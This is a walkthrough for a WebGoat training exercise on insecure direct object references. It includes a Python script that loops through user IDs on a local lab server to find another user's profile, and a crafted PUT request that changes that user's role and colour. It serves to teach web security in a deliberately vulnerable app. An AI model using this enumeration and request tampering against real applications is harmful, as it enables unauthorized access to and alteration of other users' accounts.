Insecure Direct Object Reference (5)

Playing with the Patterns

View Another Profile

View someone else’s profile by using the alternate path you already used to view your own profile. Use the 'View Profile' button and intercept/modify the request to view another profile. Alternatively, you may also just be able to use a manual GET request with your browser.

Edit Another Profile

Older apps may follow different patterns, but RESTful apps (which is what’s going on here) often just change methods (and include a body or not) to perform different functions.

Use that knowledge to take the same base request, change its method, path and body (payload) to modify another user’s (Buffalo Bill’s) profile. Change the role to something lower (since higher privilege roles and users are ususally lower numbers). Also change the user’s color to 'red'.

Solution

💡 The default request here won't work at all, so you will need to manually craft the request or tamper it with a proxy 💡 You will likely need to 'fuzz' to try different values for the userId at the end of the Url 💡 Try incrementing the id value. It's not a simple +1, but it's also not too far off 💡 For editing the other user's profile, you will need to use the proxy or manually craft the request again 💡 To edit the other user's profile, you will use the same Url you did to view the other user's profile 💡 To edit, You will need to change the method, what is the RESTful method used for 'update' or 'edit'? 💡 You will also need the body of the request (will look something like the profile) 💡 The request should go to ... /WebGoat/IDOR/profile/{Buffalo Bills Id} 💡 Your payload should look something like ... {"role" : 1,"color" : "red","size" : "small","name" : "Tom Cat","userId" : "2342388"}

View Another Profile: The script below fuzz the URL found in the previous exercise to find another profile. We find one at 2342388.

import requests  
  
def idor_5():  
     index = 2342300  
  
     headers = {  
         'Cookie': COOKIE,  
     }  
  
     while True:  
         r = requests.get('http://192.168.99.100:8080/WebGoat/IDOR/profile/{}'.format(index), headers=headers)  
  
         if r.status_code != 500 and index != 2342384:  
             print("Index: {}".format(index))  
             return  
         index += 1  
  
idor_5()

Edit Another Profile: Send a PUT request to http://192.168.99.100:8080/WebGoat/IDOR/profile/2342388 with header Content-Type: application/json and body {"role":1, "color":"red", "size":"large", "name":"Buffalo Bill", "userId":2342388}

PreviousInsecure Direct Object Reference (4)NextMissing Function Level Access Control (2)

Last updated